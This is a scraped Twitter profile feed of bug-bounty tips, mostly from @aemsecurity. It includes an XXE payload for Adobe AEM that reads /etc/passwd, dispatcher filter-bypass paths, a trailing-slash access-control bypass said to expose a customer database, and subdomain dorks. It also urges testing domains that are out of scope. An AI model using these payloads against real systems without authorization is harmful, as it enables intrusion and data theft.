Cyber Crime NEWS (@cybercrimenews) 's Twitter Profile
Cyber Crime NEWS

@cybercrimenews

Nothing better than a good morning cup of tea and the world at your fingertips!!

ID: 215665447

linkhttps://www.linkedin.com/in/ateekkhan/ calendar_today14-11-2010 15:43:36

109,109K Tweet

10,10K Takipçi

2,2K Takip Edilen

AEMSecurity (@aemsecurity) 's Twitter Profile Photo

[+] #bugbountytips You really need to analyze logs manually via "Logger" when Using Burp Suite. I confirmed 4 HTTP Request smuggling issues + 2 SSRF's and these issues were not flagged by Burp scanner so yup! see what I mean? #AEMSecurity #bugbountytip

AEMSecurity (@aemsecurity) 's Twitter Profile Photo

#bugbounty Have you ever faced this situation where you thought it was a "CRIT" however triager declares it as a "LOW"??? youtube.com/watch?v=njO8mm…

Rajveer (@r4jve3r) 's Twitter Profile Photo

Thanks to Mikhail Egorov & AEMSecurity for sharing their research with us. Debangshu 🇮🇳🥷 has very good knowledge about AEM Testing, if you stuck somewhere, you can ask him like I did. In case I've missed any other resources, please drop them below.

Cyber Crime NEWS (@cybercrimenews) 's Twitter Profile Photo

Be careful when visiting websites blindly!!! Just noticed this website that is probably compromised from before and is right now spreading malicious viruses/trojans to whoever visits it... #stayvigilant #cybersecurity #awareness #cybercrimenews

Be careful when visiting websites blindly!!! Just noticed this website that is probably compromised from before and is right now spreading malicious viruses/trojans to whoever visits it... 

#stayvigilant #cybersecurity #awareness #cybercrimenews
AEMSecurity (@aemsecurity) 's Twitter Profile Photo

Amazed to see CVE-2016-0956 Apache Sling POST Servlet vulnerability discovered back in 2014 still works!!!!!! #AEMSecurity #bugbountytips #bugbountytips

Amazed to see CVE-2016-0956 Apache Sling POST Servlet vulnerability discovered back in 2014 still works!!!!!!  #AEMSecurity #bugbountytips #bugbountytips
AEMSecurity (@aemsecurity) 's Twitter Profile Photo

[+] Another awesome Adobe AEM Dispatcher filter bypass technique? oh okay Hunting for JSON GET Servlet on /content.1.json however result = 404? Try this: /conten/.1.json /conten/t.1.json /content.tidy.1.json /conten/.tidy.infinity.json #AEMSecurity #bugbountytips #pentesting

AEMSecurity (@aemsecurity) 's Twitter Profile Photo

[+] FIlter bypass techniques: Sometimes you can do amazing things just by appending /? to bypass access control restrictions ;) #AEMSecurity #FilterBypass #bugbountytips #bugbountytip

[+] FIlter bypass techniques: 

Sometimes you can do amazing things just by appending /? to bypass access control restrictions ;)

#AEMSecurity #FilterBypass #bugbountytips #bugbountytip
AEMSecurity (@aemsecurity) 's Twitter Profile Photo

POC: https://targetdomain/api/endpoint <-- Access Denied https://targetdomain/api/endpoint/? <--- Access to entire customer database

AEMSecurity (@aemsecurity) 's Twitter Profile Photo

[+] Dont ignore those out of scope domains! Recently, I saw an application. This domain was listed as out of scope unfortunately.. More recon on target assets, I noticed very same application hosted on an IP owned by the same org Result: 4 IDOR's, 4 SXSS's #bugbountytips

[+] Dont ignore those out of scope domains!

Recently, I saw an application. This domain was listed as out of scope unfortunately.. 

More recon on target assets, I noticed very same application hosted on an IP owned by the same org
Result: 4 IDOR's, 4 SXSS's

#bugbountytips
AEMSecurity (@aemsecurity) 's Twitter Profile Photo

[+] HTTP Request Smuggling: Recently while playing with HTTP Request Smuggling I came across an instance where the usual HTTP verbs e.g. POST, HEAD etc did not have any affect However using "TEST" as HTTP verb <--- worked and resulted in two different headers in the HTTP

AEMSecurity (@aemsecurity) 's Twitter Profile Photo

[+] Using Google dorks for unique subdomains? Try this: site:*-*-*.yourtarget.com site:*-*.*.yourtarget.com site:*.*.*.yourtarget.com #bugbountytips #bugbountytip #AEMSecurity

NXTL Solutions (@nxtlsolutions) 's Twitter Profile Photo

Giving back to the community is a core part of who we are. This month, our team hosted free #SecureCoding workshops for local developers, promoting safer code practices across the UAE. Together, we can raise the bar for security standards! #NXTLSolutions #CyberSecurity

Giving back to the community is a core part of who we are. This month, our team hosted free #SecureCoding workshops for local developers, promoting safer code practices across the UAE. Together, we can raise the bar for security standards! #NXTLSolutions #CyberSecurity
AEMSecurity (@aemsecurity) 's Twitter Profile Photo

AEM guideContainer XXE? guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<%3fxml+version%3d\"1.0\"+encoding%3d\"utf-8\"%3f><!DOCTYPE+afData+[<!ENTITY+a+SYSTEM+\"file%3a///etc/passwd\">]><afData>%26a%3b</afData>"}}} #AEMSecurity

AEM guideContainer XXE?

guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"&lt;%3fxml+version%3d\"1.0\"+encoding%3d\"utf-8\"%3f&gt;&lt;!DOCTYPE+afData+[&lt;!ENTITY+a+SYSTEM+\"file%3a///etc/passwd\"&gt;]&gt;&lt;afData&gt;%26a%3b&lt;/afData&gt;"}}}
#AEMSecurity
NXTL Solutions (@nxtlsolutions) 's Twitter Profile Photo

[+] CVE-2024-34070 NXTL Solutions offensive security team is dedicated to securing cyberspace with advanced vulnerability research. Recently dicovered a critical Blind XSS vulnerability > Froxlor leading to potential app compromise. #Bugbountytips #NXTLSolutions #bugbountytip

[+] CVE-2024-34070

NXTL Solutions offensive security team is dedicated to securing cyberspace with advanced vulnerability research. Recently dicovered a critical Blind XSS vulnerability &gt; Froxlor leading to potential app compromise.

#Bugbountytips #NXTLSolutions #bugbountytip